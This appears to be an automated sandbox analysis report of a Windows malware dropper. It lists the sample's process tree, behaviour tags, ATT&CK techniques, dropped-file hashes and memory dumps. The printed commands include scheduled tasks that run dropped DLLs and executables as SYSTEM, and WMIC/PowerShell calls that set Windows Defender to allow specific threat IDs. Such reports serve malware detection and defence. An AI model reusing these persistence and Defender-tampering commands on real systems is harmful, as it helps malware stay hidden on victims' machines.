schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\srAtop.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1192

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JRajWlGIFNTafba2" /F /xml "C:\Program Files (x86)\anjFGKdzU\kuTEXGw.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2884

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JRajWlGIFNTafba"
2⤵
PID:2244

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JRajWlGIFNTafba"
2⤵
PID:3928

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qSowRyyhLSmcKu" /F /xml "C:\Program Files (x86)\ELOJFuMDhuHU2\lfcipvF.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2312

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zZitECanQvSGT2" /F /xml "C:\ProgramData\pDJsDjHXtdwyYAVB\TMHmmyg.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3864

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "HnoUfytMDNockSMLx2" /F /xml "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\BLkhyQQ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3796

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YDobIUwcTgUwZexlzfE2" /F /xml "C:\Program Files (x86)\pQmgloyPupxgC\PDkSqQD.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1876

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "wNQepEmyQbhZnWiRT" /SC once /ST 04:29:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\PKiLwykP\vybEABY.dll\",#1 /site_id 767" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3904

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "wNQepEmyQbhZnWiRT"
2⤵
PID:2208

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "spuTBRNLNNpH" /SC once /ST 00:40:29 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZRjexhvE\FYIHyAw.exe\" en /S"
2⤵
- Creates scheduled task(s)
PID:3480

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "spuTBRNLNNpH"
2⤵
PID:3704

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "spuTBRNLNNpH"
2⤵
PID:2312

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "spuTBRNLNNpH"
2⤵
PID:1368

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jrzNdZzegeVMzeqYf"
2⤵
PID:1696

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\rUaCEWwDdnKMYjxw\PKiLwykP\vybEABY.dll",#1 /site_id 767
1⤵
PID:3320

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\rUaCEWwDdnKMYjxw\PKiLwykP\vybEABY.dll",#1 /site_id 767
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:876

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "wNQepEmyQbhZnWiRT"
3⤵
PID:3528

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZRjexhvE\FYIHyAw.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZRjexhvE\FYIHyAw.exe en /S
1⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:1320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:3532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:648

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:3948

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2676

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1692

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2388

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1044

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3512

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Browser Extensions

T1176

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ELOJFuMDhuHU2\lfcipvF.xml
MD5
b627503ace8528e4bfd7eedf04fdc786

SHA1
a58e3e76aee216bbbe88a23c853a0cd6d8be6148

SHA256
36da38fe5dc5267b9e7c297a3801b2f278a48ed310ee2d09e669bffbd5f747a5

SHA512
fc847a331568e643d67fe605c2704dc0e8ab802994b84f6218fc8cfa73bc7b2f98e4275328baa2df57fad77fb2db6c7c8b3843c2f911c6ce365e249dd8d470fe

Download Submit
C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\BLkhyQQ.xml
MD5
53589bff9265b5b21c0a16a922f5254f

SHA1
4a6ed355b2d24073f01a13d5fdd99369f725d0c2

SHA256
b56cdffd04f5665be2364e371892698a8efd1e2d9af254c03da3cc370b55c362

SHA512
eb07060ffc3b00243d6ef1aadb865d379d0f7da12549d09db416836588e1e0693ce60127aca248e345997027cb2034c96fb5ee6b6a770b3f6c25117696ba9483

Download Submit
C:\Program Files (x86)\anjFGKdzU\kuTEXGw.xml
MD5
7203fa6488e45c871a0cabb554433371

SHA1
9196cd6e0c7b9fcf1694acf73bf8e59603e8376e

SHA256
d737eafc97371078a7ea975d55bbae4d4c978219e8711c5bc7d8e445ba7a6336

SHA512
60853e150d089d7c65103c37a3cbd63051db5fdef00d28e904b42c3aa2cb18ebe2009457ee18d9d3578743f4c7513a1acf4674022b2899f6ed5682458d09d62a

Download Submit
C:\Program Files (x86)\pQmgloyPupxgC\PDkSqQD.xml
MD5
41cdf70eb8d965d853ebba838cbc5c00

SHA1
904863ed9bdc933940b4e7943e9f0b91afe0011b

SHA256
fb9e3dbbdc0b2ed4ed66eb0422f371474fb8c24d9e989339710364fba6ea01aa

SHA512
19b7f90d243f654bb577a7cf16b0ccf372bb2b07430a0f266bb13cac0dbdaeec9814e56e04d425628845cfe61c64391ef69b634b48f3bac372a330037a6dd2fa

Download Submit
C:\ProgramData\pDJsDjHXtdwyYAVB\TMHmmyg.xml
MD5
a49a44d6885a338f982c781c7a9add9c

SHA1
c49b2756735f407ae83b300e44e5396bad84d983

SHA256
899c5a3840b2a5d311ebc2e13132bd90dd01c7df5c54a85bad80295a7efd5ec5

SHA512
0c29c5e065f15a537b11e37e77e88f84daadac24f0db980741e2665b27358cbc9bae91ec259a1f392cf6ed7750a625833a5012296b3ca135429d524f9057c253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8604cbd71f87363619c3d16e4cf27b10

SHA1
ff6c9c53e5af644e57d8c7ebed93fc2c3016d49e

SHA256
99251e43db30f1079a47fcdbbdc9a452bc922d233e574607cdf9e0dc7bdaccfe

SHA512
649d8f8ae67390d14723f8546be2c33400a2235a51c9a69fbcb96164c5bd25e41468a440dd424bbde8ab16583982b44a615e3337f5e224bfaba6ba6a63e624b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3e7ad06e1441909ef379e42a270998aa

SHA1
2aa179d8a83d9434ddf1bb5f67e22470c1662a17

SHA256
e80e67df94c75a8be1056093f0c8fa599bf3c2ac6aad4bbef8d214784a9ec279

SHA512
18d8bfd1df0d1f459b20f5d88edb0cf8d0ab4133f3ca4c8d5d1ff04c763815b48d93d7c01df82568e4b371f7ed003e7f42c3f413d72c6fe40ef9db6504131140

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
32f6afd5f06d84e1fa2d9144a5e5e721

SHA1
87c8aa0814ee447a3d8ed3408950f8011f3c8bd4

SHA256
d5fefe0de4aab430899af24cc779eee6b28df0c0ee44d19b5e824205642c2122

SHA512
7de22117606caa9b0e9b453b56bd77e178f877cb383a4f9d61682ff662f7b439bebdf574f9fcabe2ed2f98dc32dd820828a98554a274f90d11c08fa2ce937793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4dbe9266c72d18b4aeaf32d751dadffd

SHA1
f8262d3c1f0afcaae8747c6e7df0ed1604965d31

SHA256
b25c41ed972b2782c891484fec22e52532554278aa87c720c2a30a88b2fb8ac5

SHA512
9220c673b0cbe157bb4a526376c02f0996a82b5fc177093e911a6f206f2fc2f31265c879d6cfdc5c86cfeacf600b6322ef61d0bc655b0bc1554236004c749e1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
36a6f90c7170bf4b9f6d745d25ceacfa

SHA1
21acb7ea64df1e343cfaf3913b1b8a0c09e64c5d

SHA256
eef417aaea51467caf815c5b48724956eaf542b9f2b00768cda9177c8cc56795

SHA512
eca6db58e7867e008cc34b3b3a7169951f445876a9557ed4866eab5782a06ce4e9e7e1ffa0a26dba257ea2a6cb40edfa675c1c257dd8d7637458e0528c30f92e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
929ce7fb8927c35fae8407c3c173aebc

SHA1
bdb9f94053f3918d8cb0a96348fa0fa8e4e974a4

SHA256
080d68246f34b9b25f84e6d0c0a44900fc267a848a688e53e20511ec38224c2b

SHA512
5b86c840f0cce69d34fa86a883e71387265e3ee0119102fdc2798706457df4ba998d184f640257e8ad78735f4a3f21f1911cf6856730ea0867a128fd65650171

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3763ad832f29df48e0f83b0caaf4e65d

SHA1
d51b1da671c35b5ce825562091e4889424f95e47

SHA256
73e862f4bf99b8c6c7b078a65b8924030f6d2737b2cddaf934c5300f9e13840b

SHA512
6fa2e688ad016bed2e2450cda68a988f5a865b8583d46ab329bab609ba16a7039b9443048f74e77af8236f26b08b8b8e2ee796ea3bfc1c574ffd70f5f0dd56d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS163D.tmp\SimplInst.exe
MD5
46df9dcd0ad008a87f7622bfbcec411b

SHA1
0a4c7dd60e6d7a1b5fd06ad3480a26eed4163bba

SHA256
e4210262fea7091bbff2663ab44015417e4ff6b96f5003864a2e5096b203ea3a

SHA512
e3d2941790b2adb23dfcbf9b29b74c3df05089569490105a72e363f718c75ab9038d5f559ebf5ffd878d5da5054fcbb157bb1186c4d0d02d97ec9d0f813f7948

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS163D.tmp\SimplInst.exe
MD5
46df9dcd0ad008a87f7622bfbcec411b

SHA1
0a4c7dd60e6d7a1b5fd06ad3480a26eed4163bba

SHA256
e4210262fea7091bbff2663ab44015417e4ff6b96f5003864a2e5096b203ea3a

SHA512
e3d2941790b2adb23dfcbf9b29b74c3df05089569490105a72e363f718c75ab9038d5f559ebf5ffd878d5da5054fcbb157bb1186c4d0d02d97ec9d0f813f7948

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS16F8.tmp\SimplInst.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS16F8.tmp\SimplInst.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZRjexhvE\FYIHyAw.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\ZRjexhvE\FYIHyAw.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\PIBpJDt.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\PIBpJDt.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
36f9d76b56c3a490b4e0053612f8a437

SHA1
b26999ea9e1600804b93f2988ab051e6fdf47f76

SHA256
73dbd01d091b0ffec1626c59f80d9b3e4b162d1e3bcd4dceb842120b0e2eff16

SHA512
1f2cfddd2aafb573a2a99d71d7ad189a3cb82a8bf4a68117ac524a7c71957a3d852830b9dafbff4a53b2b73ef442707e791186b5e7cc50543a10af69cace080f

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
11d9b4f55894ab84554f7fcfb716f95f

SHA1
32dd6f2bd73fbb0738bc4acba06e01000cc0b5aa

SHA256
342f1075f18413878f0f4646f5efea9dc2f79772caa1f4509f7be9155873b6e4

SHA512
156f6845bc8e2393cb5cff213fe12e6e03e910bf3227acfb6287dfe7c7963e32d7ac6262d1027a74391902af00f9f3d95083e0a71bfc3df87320830be5f9d823

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d62dd3ee8bfd4c37a50699740dbb2605

SHA1
31350873b3fa338ea683bdd47835f3f6a2fae8f2

SHA256
47eb899b071c97adaa2328f17e8ea062f2a205a8bc98fb254caa293cd494f7db

SHA512
55e6f9f0e7c2971f97344fbb52a1f45845dfc0e3bfa1a119088bb4e26bead603a100e1ca25686b24441f54b8bb5ca6aff49f20682ebd26e086c652c953fc7d2a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e6af1c0b884dec23bfef042f48e05dea

SHA1
02d05c95b63be4c7089db1ad966f77b1d612ba18

SHA256
e699662d21caa1f61a5e760fe658454f87bc5f33b111bfe64dbe819aec51f4e4

SHA512
3a12abf8ee3c32a003f72d9e7d884cce5400f119cbc251760e48771a8caa2bb16d976b4c205873dfaf5f8e5df718c42bf4944c5826ab7f343730de2275a4bab0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
42b0cd68022b4d3ddaa8fe14afa95bcc

SHA1
14c13c040d24f73903b0c463aad9db11529f16f3

SHA256
d2cb8af772bfca9c352633ec6241cdaa7e1d621f5a09284f8a44f83e00ac930e

SHA512
bf69f32e607746b9fe0e3edadb5dfb812cdfb02bbd08bf11d17f078e7f6d32364b919eed6f01fd243db3a25825d69303d29deea45aa66e3d68f7f47804a585ab

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a85d59f4ae9655de585e7c70d16897ea

SHA1
83d17afa62c9325e9d877754394d5074a4f12af3

SHA256
718e6d81c456b40cd63ac560633ad95bf13dcd2f8e04aa6caa7d95d1708c88d9

SHA512
f99a0b8a60ea22b5ffca635082edb12cc95f43908e9d8c0520661ca1f7754fd1ffb9a028bb9e50a253c1863e907c5026e25283e13d49b853f7a35a1b67ac6e66

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5ae7a69b44de4a271ead9c84b8bad5ca

SHA1
febbe61dc4201266767b2788b916fce4d9624cb1

SHA256
455182e081677c97ef59db444873d38a72b296da90f539f60a6a5fc680f36a12

SHA512
c81deccd9342d03873f4be506f36c7af3c989aea35b94d0abbb2acb6d0f03ee15c525d14f7cd486e6425c794d52f8e2f06a3a2a827e39d6f593f9670e3957c48

Download Submit
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ZNIZXhj.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ZNIZXhj.exe
MD5
9b1d487f7f02200756742ce3a004c844

SHA1
254a42b26ba3f48c9a5a703ab231e93de2603289

SHA256
7ad23b9b58a700e2e989325b3196c4f753fae6cdd53b013aaae407d4fc82a27f

SHA512
b936fa1a0ddb9176676a906b6b164c6f5b7adb7f3fe4655fc314231da27dc8eadc3c7a0a7c91ab651768b70885a7c70ab3c4920cc025f3a9a06ccbc2dff840ca

Download Submit
C:\Windows\Temp\rUaCEWwDdnKMYjxw\PKiLwykP\vybEABY.dll
MD5
7f02a4cf475a581e3a2501f303dec277

SHA1
5e20847b2f86d73d913f8cba4f64fca47693ca55

SHA256
830df31c9c9141bf0af8278b1ab19a5df448a884a72ad69cc1204aa94ee0b1b7

SHA512
ea988d14259b28639623202126f183cbc74790235b05f4a70f81fba4f40858f6cb849feb521e51b6b36e685342e104a35af94e1254b00ae643b5fcf7ecb52d58

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Windows\Temp\rUaCEWwDdnKMYjxw\PKiLwykP\vybEABY.dll
MD5
7f02a4cf475a581e3a2501f303dec277

SHA1
5e20847b2f86d73d913f8cba4f64fca47693ca55

SHA256
830df31c9c9141bf0af8278b1ab19a5df448a884a72ad69cc1204aa94ee0b1b7

SHA512
ea988d14259b28639623202126f183cbc74790235b05f4a70f81fba4f40858f6cb849feb521e51b6b36e685342e104a35af94e1254b00ae643b5fcf7ecb52d58

Download Submit
memory/64-243-0x0000000000000000-mapping.dmp

Download
memory/184-136-0x0000000007EC0000-0x0000000007EC1000-memory.dmp

Filesize
4KB

Download
memory/184-123-0x0000000000000000-mapping.dmp

Download
memory/184-134-0x0000000007B40000-0x0000000007B41000-memory.dmp

Filesize
4KB

Download
memory/184-135-0x0000000007FC0000-0x0000000007FC1000-memory.dmp

Filesize
4KB

Download
memory/184-132-0x0000000006800000-0x0000000006801000-memory.dmp

Filesize
4KB

Download
memory/184-131-0x0000000007730000-0x0000000007731000-memory.dmp

Filesize
4KB

Download
memory/184-130-0x00000000075C0000-0x00000000075C1000-memory.dmp

Filesize
4KB

Download
memory/184-158-0x0000000006804000-0x0000000006806000-memory.dmp

Filesize
8KB

Download
memory/184-156-0x0000000006803000-0x0000000006804000-memory.dmp

Filesize
4KB

Download
memory/184-186-0x0000000000000000-mapping.dmp

Download
memory/184-129-0x0000000007470000-0x0000000007471000-memory.dmp

Filesize
4KB

Download
memory/184-128-0x0000000006CA0000-0x0000000006CA1000-memory.dmp

Filesize
4KB

Download
memory/184-127-0x0000000006E40000-0x0000000006E41000-memory.dmp

Filesize
4KB

Download
memory/184-133-0x0000000006802000-0x0000000006803000-memory.dmp

Filesize
4KB

Download
memory/184-126-0x0000000004330000-0x0000000004331000-memory.dmp

Filesize
4KB

Download
memory/192-165-0x0000000000000000-mapping.dmp

Download
memory/200-122-0x0000000000000000-mapping.dmp

Download
memory/200-218-0x0000000000000000-mapping.dmp

Download
memory/628-294-0x000002331C6B0000-0x000002331C6B2000-memory.dmp

Filesize
8KB

Download
memory/628-297-0x000002331C6B6000-0x000002331C6B8000-memory.dmp

Filesize
8KB

Download
memory/628-295-0x000002331C6B3000-0x000002331C6B5000-memory.dmp

Filesize
8KB

Download
memory/696-260-0x0000000000000000-mapping.dmp

Download
memory/756-270-0x0000000000000000-mapping.dmp

Download
memory/792-261-0x0000000000000000-mapping.dmp

Download
memory/832-267-0x0000000000000000-mapping.dmp

Download
memory/916-114-0x0000000000000000-mapping.dmp

Download
memory/1040-236-0x0000000000000000-mapping.dmp

Download
memory/1040-248-0x00000000034C3000-0x00000000034C4000-memory.dmp

Filesize
4KB

Download
memory/1040-241-0x00000000034C2000-0x00000000034C3000-memory.dmp

Filesize
4KB

Download
memory/1040-240-0x00000000034C0000-0x00000000034C1000-memory.dmp

Filesize
4KB

Download
memory/1040-249-0x00000000034C4000-0x00000000034C6000-memory.dmp

Filesize
8KB

Download
memory/1044-336-0x0000000006842000-0x0000000006843000-memory.dmp

Filesize
4KB

Download
memory/1044-338-0x0000000006844000-0x0000000006846000-memory.dmp

Filesize
8KB

Download
memory/1044-337-0x0000000006843000-0x0000000006844000-memory.dmp

Filesize
4KB

Download
memory/1044-335-0x0000000006840000-0x0000000006841000-memory.dmp

Filesize
4KB

Download
memory/1176-271-0x0000000000000000-mapping.dmp

Download
memory/1272-258-0x0000000003912000-0x0000000003913000-memory.dmp

Filesize
4KB

Download
memory/1272-281-0x0000000003913000-0x0000000003914000-memory.dmp

Filesize
4KB

Download
memory/1272-257-0x0000000003910000-0x0000000003911000-memory.dmp

Filesize
4KB

Download
memory/1272-282-0x0000000003914000-0x0000000003916000-memory.dmp

Filesize
8KB

Download
